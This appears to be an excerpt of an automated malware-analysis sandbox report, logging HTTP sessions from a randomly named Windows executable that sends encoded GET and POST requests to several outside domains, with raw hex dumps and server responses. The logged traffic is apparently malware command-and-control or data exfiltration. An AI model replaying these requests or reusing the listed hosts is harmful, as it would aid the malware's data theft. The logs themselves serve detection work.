                                May 28, 2024 07:16:45.673012972 CEST1236INData Raw: 1e 7e ef 1a 78 94 3d 34 09 bc 4f cc af 06 7e 50 56 1d 4c df 10 f8 9f 7b b6 ec a9 ed 10 c0 47 62 c1 fd 3f 3c ad 7f 5f 49 8b c0 47 3b d6 4d 3f d2 13 18 a3 04 1c 3a d2 02 70 7f 03 29 45 1c 22 8f c3 30 12 70 60 32 49 e0 31 0f 96 ff fc 30 ef ba 1e af
                                Data Ascii: ~x=4O~PVL{Gb?<_IG;M?:p)E"0p`2I10l0MJz(-CnzX5I5.IRj~tLsG8xhUWp>.NoULR'R_o7.lK4m#0Af$.pRrCC[JP3
                                May 28, 2024 07:16:45.673021078 CEST1236INData Raw: 9e a3 42 73 29 fd 9e d2 c5 30 d6 9b 92 b9 de 68 1f 1c 01 0d a2 7b a1 f4 4a 5e 57 a4 92 77 48 ae 16 01 4b 26 f1 1e 7b 29 af 01 79 eb 69 34 de 50 24 ac 8a 23 1c 28 81 27 52 ef e4 d5 3d 87 e2 e3 1e 46 68 be 73 d7 c3 38 0c 31 de 8e c9 0d 25 24 d3 58
                                Data Ascii: Bs)0h{J^WwHK&{)yi4P$#('R=Fhs81%$XM#^[EI8/(sAVF%b~r_-s.h9M^<{qxd{n4$~6767E#_;k(y_lI_M ;'c%c#)L4^t#
                                May 28, 2024 07:16:45.673029900 CEST448INData Raw: 17 9a 71 02 c1 31 d2 c7 76 89 fe ee 45 97 b5 0b 1e 70 03 ca d7 bd 70 7d 97 73 db 25 fe 3b 18 5f ba 97 6e 03 ba ee 23 97 a7 e3 23 ed 3e be 09 59 af c6 52 9d 64 6e 73 29 44 08 c9 63 12 53 12 e2 48 d6 9f c3 38 9a ae 14 e7 49 b2 92 4d de e8 55 9d 27
                                Data Ascii: q1vEpp}s%;_n##>YRdns)DcSH8IMU'84+kH_C*nB}kPf36EEx]$cv<!VPOF`J^lC+>y,A=} 0MqfQ2/1^qDaD_{
                                May 28, 2024 07:16:45.677903891 CEST1236INData Raw: 7e bd 00 26 71 24 0a 65 94 21 ba 34 91 65 94 74 0c 33 c7 a1 62 44 ef ea 2b 2c ef 26 dd d3 12 5a 17 87 a2 38 bd ad bf d2 0d 05 bd b8 78 9c 8c 43 fd 04 27 12 b0 3d 43 d6 c4 ba 6b 53 14 bb c0 a9 d5 e7 94 d1 12 86 b6 34 af 04 92 36 a3 98 a6 5f 1d 15
                                Data Ascii: ~&q$e!4et3bD+,&Z8xC'=CkS46_6P{1+=!dEXQnuVI}"NPZ"rYnI}4JghI;~{9%d)7,son:=nlrOj>d>PS


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                20192.168.2.64973292.205.15.157801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:16:47.460633993 CEST482OUTGET /ia1k/?5L0=2bCPy0&jTZPp=N7K37PwQwyq8WtMjD63BMb0ZEyGwsNHc8DxE6cCELPJHzMSs3RHBfzipjgIXVLm7nNAJX0ce6IW46RQAVIH59zJ0Pe4NazJJs+xz0T8fA0+K0n7VQeZLcDOWBXiB3y7ehLtrmgc= HTTP/1.1
                                Host: www.mavonorm-global.uk
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                May 28, 2024 07:16:48.167815924 CEST556INHTTP/1.1 301 Moved Permanently
                                Date: Tue, 28 May 2024 05:16:48 GMT
                                Server: Apache
                                X-Powered-By: PHP/8.1.28
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                X-Redirect-By: WordPress
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Location: http://mavonorm-global.uk/ia1k/?5L0=2bCPy0&jTZPp=N7K37PwQwyq8WtMjD63BMb0ZEyGwsNHc8DxE6cCELPJHzMSs3RHBfzipjgIXVLm7nNAJX0ce6IW46RQAVIH59zJ0Pe4NazJJs+xz0T8fA0+K0n7VQeZLcDOWBXiB3y7ehLtrmgc=
                                Vary: Accept-Encoding
                                Content-Length: 0
                                Content-Type: text/html; charset=UTF-8


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                21192.168.2.64973376.223.67.189801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:16:53.334171057 CEST758OUTPOST /3gap/ HTTP/1.1
                                Host: www.adhdphotography.com
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 210
                                Origin: http://www.adhdphotography.com
                                Referer: http://www.adhdphotography.com/3gap/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Raw: 6a 54 5a 50 70 3d 37 37 2f 68 6c 57 73 5a 30 50 5a 67 55 56 66 36 63 41 6e 74 53 2f 62 30 4c 63 6e 74 43 64 57 50 59 36 66 31 71 52 64 43 4c 6d 31 35 4d 75 39 39 6e 79 4f 4e 39 34 6a 43 54 75 31 69 59 77 61 42 41 58 65 47 56 2b 6e 2f 5a 32 34 49 73 61 72 46 31 78 79 45 49 42 68 32 4e 44 36 43 73 4f 6d 6c 62 66 78 77 35 61 34 49 70 75 4c 43 55 4f 72 61 49 52 5a 41 6e 39 6e 58 6a 48 59 44 48 74 69 6b 45 64 58 52 30 38 61 6b 75 4a 47 2b 7a 4f 37 54 53 7a 5a 73 68 62 49 50 2f 4e 48 53 4e 4b 2b 4f 2b 33 43 70 30 5a 52 62 51 61 4d 6d 74 2f 67 6d 39 68 4e 7a 54 39 75 43 43 61 4b 53 41 6c 61 39 4a 6f 4a 62 77 42 45 70 36 69 35 50
                                Data Ascii: jTZPp=77/hlWsZ0PZgUVf6cAntS/b0LcntCdWPY6f1qRdCLm15Mu99nyON94jCTu1iYwaBAXeGV+n/Z24IsarF1xyEIBh2ND6CsOmlbfxw5a4IpuLCUOraIRZAn9nXjHYDHtikEdXR08akuJG+zO7TSzZshbIP/NHSNK+O+3Cp0ZRbQaMmt/gm9hNzT9uCCaKSAla9JoJbwBEp6i5P


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                22192.168.2.64973476.223.67.189801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:16:55.860764027 CEST782OUTPOST /3gap/ HTTP/1.1
                                Host: www.adhdphotography.com
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 234
                                Origin: http://www.adhdphotography.com
                                Referer: http://www.adhdphotography.com/3gap/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Raw: 6a 54 5a 50 70 3d 37 37 2f 68 6c 57 73 5a 30 50 5a 67 56 31 76 36 61 69 50 74 46 50 62 37 4f 63 6e 74 59 74 57 4c 59 36 44 31 71 54 78 53 4c 56 52 35 4e 4c 5a 39 6b 32 69 4e 2b 34 6a 43 62 4f 31 6e 57 51 61 30 41 51 58 37 56 2b 4c 2f 5a 32 38 49 73 66 48 46 31 43 71 46 4b 52 68 34 56 7a 36 41 69 75 6d 6c 62 66 78 77 35 5a 45 6d 70 75 44 43 56 2b 62 61 50 41 5a 66 6d 39 6e 59 72 6e 59 44 44 74 69 67 45 64 58 34 30 39 48 7a 75 4c 2b 2b 7a 4b 2f 54 56 68 68 72 79 37 49 4a 37 4e 47 74 42 2f 54 5a 67 57 72 62 37 76 4e 70 4f 71 6b 6e 73 4a 68 38 68 53 4e 51 42 74 4f 41 43 59 53 67 41 46 61 58 4c 6f 78 62 69 57 49 4f 31 57 63 73 50 57 7a 61 35 4d 55 33 44 64 6f 48 66 47 4c 39 70 2f 4e 70 4e 67 3d 3d
                                Data Ascii: jTZPp=77/hlWsZ0PZgV1v6aiPtFPb7OcntYtWLY6D1qTxSLVR5NLZ9k2iN+4jCbO1nWQa0AQX7V+L/Z28IsfHF1CqFKRh4Vz6Aiumlbfxw5ZEmpuDCV+baPAZfm9nYrnYDDtigEdX409HzuL++zK/TVhhry7IJ7NGtB/TZgWrb7vNpOqknsJh8hSNQBtOACYSgAFaXLoxbiWIO1WcsPWza5MU3DdoHfGL9p/NpNg==


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                23192.168.2.64973576.223.67.189801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:16:58.393496990 CEST1795OUTPOST /3gap/ HTTP/1.1
                                Host: www.adhdphotography.com
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 1246
                                Origin: http://www.adhdphotography.com
                                Referer: http://www.adhdphotography.com/3gap/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Raw: 6a 54 5a 50 70 3d 37 37 2f 68 6c 57 73 5a 30 50 5a 67 56 31 76 36 61 69 50 74 46 50 62 37 4f 63 6e 74 59 74 57 4c 59 36 44 31 71 54 78 53 4c 56 5a 35 4d 39 56 39 6d 58 69 4e 2f 34 6a 43 56 75 31 6d 57 51 61 54 41 52 79 38 56 2b 33 46 5a 77 67 49 6a 5a 54 46 39 54 71 46 44 52 68 34 4a 44 36 64 73 4f 6e 6c 62 5a 52 30 35 61 73 6d 70 75 44 43 56 39 44 61 5a 42 5a 66 6b 39 6e 58 6a 48 59 50 48 74 69 59 45 65 6e 43 30 39 43 4f 75 36 65 2b 39 4f 62 54 55 55 31 72 78 62 49 4c 32 74 47 31 42 2f 57 65 67 57 6d 71 37 76 52 50 4f 74 55 6e 75 4e 63 41 2b 32 46 39 59 75 61 6b 58 6f 71 45 47 79 2f 6c 44 71 74 72 6d 48 51 6c 39 31 45 48 4a 7a 48 78 38 36 64 30 49 4e 45 35 57 43 57 30 68 74 6b 48 59 6a 2b 74 4d 70 31 4b 37 67 6a 76 4e 47 5a 64 36 51 6d 4a 30 6c 39 34 58 34 77 6a 33 6c 52 34 68 53 54 4f 6e 39 69 6c 50 4b 54 57 77 71 31 49 4a 65 72 33 6d 4d 34 74 51 70 6b 63 77 68 41 4b 32 78 39 4c 79 5a 59 2b 39 54 72 6f 54 51 53 78 35 6d 77 56 2b 34 32 4a 65 52 56 69 4e 78 57 54 4c 73 45 4f 64 53 55 57 48 61 49 32 [TRUNCATED]
                                Data Ascii: jTZPp=77/hlWsZ0PZgV1v6aiPtFPb7OcntYtWLY6D1qTxSLVZ5M9V9mXiN/4jCVu1mWQaTARy8V+3FZwgIjZTF9TqFDRh4JD6dsOnlbZR05asmpuDCV9DaZBZfk9nXjHYPHtiYEenC09COu6e+9ObTUU1rxbIL2tG1B/WegWmq7vRPOtUnuNcA+2F9YuakXoqEGy/lDqtrmHQl91EHJzHx86d0INE5WCW0htkHYj+tMp1K7gjvNGZd6QmJ0l94X4wj3lR4hSTOn9ilPKTWwq1IJer3mM4tQpkcwhAK2x9LyZY+9TroTQSx5mwV+42JeRViNxWTLsEOdSUWHaI23tr4ayJPEEMeTS+AT07kuHsPMkROAijBco0cCt14Jonk71IOiLfBc8Eon+yRulmL+WC4mV1umLEam7ca4q6Yz5Wm8jDNWjPLvA2aHJvciXFCE11NZdM2UjLiotXWwsXhsp1MHnsdu39ZKJVjU4LGv+AGsJqmMuQapzLxYpg1xeuXm6zxlT+l+LEKj7QDrvZ2zkbqbPb+ee0n+AEzqUU7aMfTZnNAqqit13TUpdzjLXeqOss30y5KjwCixca+8uEG717OXn7k/qNjLAgbJMrLpgcFhxHIJ4BOZJ4H5pXQVCQ+XPsiKbPcSyMxlPw1QRFjrW2HVvcy3nr1Q871z6whmfsMIqZ5Olm9TL5nrtPv9+45QjWxf18pSTIhCr2qKAfxvzpctrBI+fw/LIykpXNNphpKIEChYC/1q3+aPzUxfWTDX2NBKbgsxczzKq0EcljP1bAQ+HEeciVL5qr6X6GKAuOVhTfHZ0xzRgrN8FtDbkNZ/OFkfMVna1Za4MkSJhyrVSFGv7OKnVVzHfmihp6V/T970iKjoiM0cIKcBK+PM3e6X4rGh8UMwTePRYSITQu+9HZdJWz+4WTAkOFfubVjiXAxfWIbaUGP+yI1Rzx2F2KgFZxHFoKdbvYS0CS/OyO6t6BeqMDNugbPewHLzsnNUktwMQHibYXepC [TRUNCATED]


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                24192.168.2.64973676.223.67.189801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:17:00.926425934 CEST483OUTGET /3gap/?jTZPp=25XBmjk0rqRaZkTkTD33T4OKGuWwQ/SEWL7mpnFDJER+MbRh/i2897KjaMR3WmWzMQOMItzOUFcJjK77+ET6PAxFDluhudTDf5JDha8/kN27L+7nUHVdmuvgnjQrBoWJDdvnsqo=&5L0=2bCPy0 HTTP/1.1
                                Host: www.adhdphotography.com
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                May 28, 2024 07:17:01.417190075 CEST408INHTTP/1.1 200 OK
                                Server: openresty
                                Date: Tue, 28 May 2024 05:17:01 GMT
                                Content-Type: text/html
                                Content-Length: 268
                                Connection: close
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6a 54 5a 50 70 3d 32 35 58 42 6d 6a 6b 30 72 71 52 61 5a 6b 54 6b 54 44 33 33 54 34 4f 4b 47 75 57 77 51 2f 53 45 57 4c 37 6d 70 6e 46 44 4a 45 52 2b 4d 62 52 68 2f 69 32 38 39 37 4b 6a 61 4d 52 33 57 6d 57 7a 4d 51 4f 4d 49 74 7a 4f 55 46 63 4a 6a 4b 37 37 2b 45 54 36 50 41 78 46 44 6c 75 68 75 64 54 44 66 35 4a 44 68 61 38 2f 6b 4e 32 37 4c 2b 37 6e 55 48 56 64 6d 75 76 67 6e 6a 51 72 42 6f 57 4a 44 64 76 6e 73 71 6f 3d 26 35 4c 30 3d 32 62 43 50 79 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?jTZPp=25XBmjk0rqRaZkTkTD33T4OKGuWwQ/SEWL7mpnFDJER+MbRh/i2897KjaMR3WmWzMQOMItzOUFcJjK77+ET6PAxFDluhudTDf5JDha8/kN27L+7nUHVdmuvgnjQrBoWJDdvnsqo=&5L0=2bCPy0"}</script></head></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                25192.168.2.649737216.40.34.41801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:17:06.750149012 CEST764OUTPOST /dkdj/ HTTP/1.1
                                Host: www.allgiftedmalaysia.com
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 210
                                Origin: http://www.allgiftedmalaysia.com
                                Referer: http://www.allgiftedmalaysia.com/dkdj/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Raw: 6a 54 5a 50 70 3d 5a 30 6b 37 4c 30 49 6f 47 63 69 72 39 75 4f 46 48 39 47 4b 31 64 6a 39 44 6f 6e 34 77 2f 4d 69 4b 72 76 63 71 39 65 78 55 53 56 76 51 61 52 39 68 4b 79 79 55 6d 53 58 5a 5a 67 59 41 34 49 57 6f 4d 57 34 33 75 58 4c 72 78 59 55 77 69 64 50 72 77 73 45 64 4d 6b 38 4e 38 59 6b 6c 52 48 65 4f 61 55 62 48 49 4e 46 64 56 6e 30 4f 6d 6e 54 38 62 64 6b 31 55 46 66 4e 58 78 54 45 54 33 76 76 57 6a 4d 4c 4d 5a 33 2f 4e 64 49 44 65 45 4a 6b 6d 4b 34 75 30 34 49 56 2f 54 6a 65 6d 76 41 6c 65 68 75 77 52 32 44 2f 64 53 72 33 62 31 6a 58 30 43 58 48 63 32 50 78 54 57 6a 30 54 2b 59 74 6a 41 30 33 44 6d 4e 78 32 41 62
                                Data Ascii: jTZPp=Z0k7L0IoGcir9uOFH9GK1dj9Don4w/MiKrvcq9exUSVvQaR9hKyyUmSXZZgYA4IWoMW43uXLrxYUwidPrwsEdMk8N8YklRHeOaUbHINFdVn0OmnT8bdk1UFfNXxTET3vvWjMLMZ3/NdIDeEJkmK4u04IV/TjemvAlehuwR2D/dSr3b1jX0CXHc2PxTWj0T+YtjA03DmNx2Ab
                                May 28, 2024 07:17:07.266199112 CEST1236INHTTP/1.1 404 Not Found
                                content-type: text/html; charset=UTF-8
                                x-request-id: 72662986-fa05-4e92-a665-bfcf77779dda
                                x-runtime: 0.029467
                                content-length: 18254
                                connection: close
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                May 28, 2024 07:17:07.266217947 CEST1236INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                May 28, 2024 07:17:07.266230106 CEST1236INData Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c
                                Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                May 28, 2024 07:17:07.266235113 CEST1236INData Raw: 0a 20 20 20 20 76 61 72 20 74 6f 67 67 6c 65 53 65 73 73 69 6f 6e 44 75 6d 70 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 6f 67 67 6c 65 28 27 73 65 73 73 69 6f 6e 5f 64 75 6d 70 27 29 3b 0a 20 20 20
                                Data Ascii: var toggleSessionDump = function() { return toggle('session_dump'); } var toggleEnvDump = function() { return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="c
                                May 28, 2024 07:17:07.266241074 CEST1236INData Raw: 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 68 6f 77 5f 65 78 63 65 70 74 69 6f 6e 73 2e 72 62 3a 33 33 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65
                                Data Ascii: ion_dispatch/middleware/show_exceptions.rb:33:in `call&#39;</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" h
                                May 28, 2024 07:17:07.266253948 CEST1236INData Raw: 5f 69 64 2e 72 62 3a 32 37 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 31 22 20 68 72 65 66 3d 22 23 22
                                Data Ascii: _id.rb:27:in `call&#39;</a><br><a class="trace-frames" data-frame-id="11" href="#">rack (2.2.3) lib/rack/method_override.rb:24:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `cal
                                May 28, 2024 07:17:07.266266108 CEST776INData Raw: 32 3a 69 6e 20 60 70 72 6f 63 65 73 73 5f 63 6c 69 65 6e 74 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 32 31 22 20 68 72 65 66 3d 22
                                Data Ascii: 2:in `process_client&#39;</a><br><a class="trace-frames" data-frame-id="21" href="#">puma (4.3.9) lib/puma/server.rb:328:in `block in run&#39;</a><br><a class="trace-frames" data-frame-id="22" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:
                                May 28, 2024 07:17:07.266277075 CEST1236INData Raw: 6c 5f 61 70 70 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 33 22 20 68 72 65 66 3d 22 23 22 3e 72 61 69 6c 74 69 65 73 20 28 35 2e 32
                                Data Ascii: l_app&#39;</a><br><a class="trace-frames" data-frame-id="3" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `block in call&#39;</a><br><a class="trace-frames" data-frame-id="4" href="#">activesupport (5.2.6) lib/active_support/tagged_
                                May 28, 2024 07:17:07.266288996 CEST1236INData Raw: 2d 69 64 3d 22 31 32 22 20 68 72 65 66 3d 22 23 22 3e 72 61 63 6b 20 28 32 2e 32 2e 33 29 20 6c 69 62 2f 72 61 63 6b 2f 72 75 6e 74 69 6d 65 2e 72 62 3a 32 32 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73
                                Data Ascii: -id="12" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call&#39;</a><br><a class="trace-frames" data-frame-id="13" href="#">activesupport (5.2.6) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call&#39;</a><br><a class="
                                May 28, 2024 07:17:07.266300917 CEST1236INData Raw: 6d 65 2d 69 64 3d 22 32 32 22 20 68 72 65 66 3d 22 23 22 3e 70 75 6d 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 74 68 72 65 61 64 5f 70 6f 6f 6c 2e 72 62 3a 31 33 34 3a 69 6e 20 60 62 6c 6f 63 6b 20 69 6e 20 73 70 61 77 6e 5f 74 68
                                Data Ascii: me-id="22" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread&#39;</a><br></code></pre> </div> <script type="text/javascript"> var traceFrames = document.getElementsByClassName('trace-frames'); var selec
                                May 28, 2024 07:17:07.271333933 CEST1132INData Raw: 3c 2f 68 32 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 52 6f 75 74 65 73 20 6d 61 74 63 68 20 69 6e 20 70 72 69 6f 72 69 74 79 20 66 72 6f 6d 20 74 6f 70 20 74 6f 20 62 6f 74 74 6f 6d 0a 20 20 20 20 3c 2f 70 3e 0a 0a 20 20 20 20 0a 3c 74
                                Data Ascii: </h2> <p> Routes match in priority from top to bottom </p> <table id='route_table' class='route_table'> <thead> <tr> <th>Helper</th> <th>HTTP Verb</th> <th>Path</th> <th>Controller#Action</th>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                26192.168.2.649738216.40.34.41801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:17:09.283747911 CEST788OUTPOST /dkdj/ HTTP/1.1
                                Host: www.allgiftedmalaysia.com
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 234
                                Origin: http://www.allgiftedmalaysia.com
                                Referer: http://www.allgiftedmalaysia.com/dkdj/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
